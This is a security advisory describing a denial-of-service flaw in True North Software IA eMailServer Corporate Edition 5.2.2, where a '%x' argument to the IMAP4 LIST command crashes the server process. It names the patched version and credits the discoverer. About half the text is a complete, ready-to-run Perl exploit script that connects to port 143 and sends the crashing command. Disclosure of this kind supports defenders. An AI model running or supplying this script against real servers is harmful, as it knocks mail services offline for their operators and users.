A denial of service vulnerability exists in the True North Software IA eMailServer Corporate Edition version 5.2.2. Build: 1051. Input to the IMAP4 LIST command is not properly checked. Perl exploit provided.
c6a4487d3cf352e0cc68caba9961d47584d5dfcbf146b2cf528b97fd38c0685f
Summary:
Denial of Service Vulnerability in True North Software, Inc. IA
eMailServer Corporate Edition Version: 5.2.2. Build: 1051.
(https://www.tnsoft.com/)
Details:
Input to the IMAP4 LIST command is not properly checked and/or
filtered. Issuing a single character '%x' as the second argument to
the LIST command will cause the MailServer.exe process to die.
Vulnerable Versions:
True North Software, Inc. IA eMailServer Corporate Edition Version:
5.2.2. Build: 1051.
Patches/Workarounds:
IA eMailServer Corporate Edition Version: 5.3.4. Build: 2019. is not
vulnerable to this attack. It is available at https://www.tnsoft.com/.
Exploit:
Run the following PERL script against the server. The process will die.
#===== Start IAeMailServer_DOS.pl =====
#
# Usage: IAeMailServer_DOS.pl <ip>
# IAeMailServer_DOS.pl 127.0.0.1
#
# True North Software, Inc. IA eMailServer Corporate Edition
# Version: 5.2.2. Build: 1051.
#
# Download:
# https://www.tnsoft.com/
#
#############################################################
use IO::Socket;
use strict;
my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "143",
Proto => "TCP"))
{
print "Attempting to kill IA eMailServer at $ARGV[0]:143...";
sleep(1);
print $socket "0000 LOGIN hello moto\r\n";
sleep(1);
print $socket "0001 LIST 1 \%x\r\n";
close($socket);
}
else
{
print "Cannot connect to $ARGV[0]:143\n";
}
#===== End IAeMailServer_DOS.pl =====
Discovered by Reed Arvin reedarvin[at]gmail[dot]com
(https://reedarvin.thearvins.com/)
Vulnerability discovered using PeachFuzz
(https://reedarvin.thearvins.com/tools.html)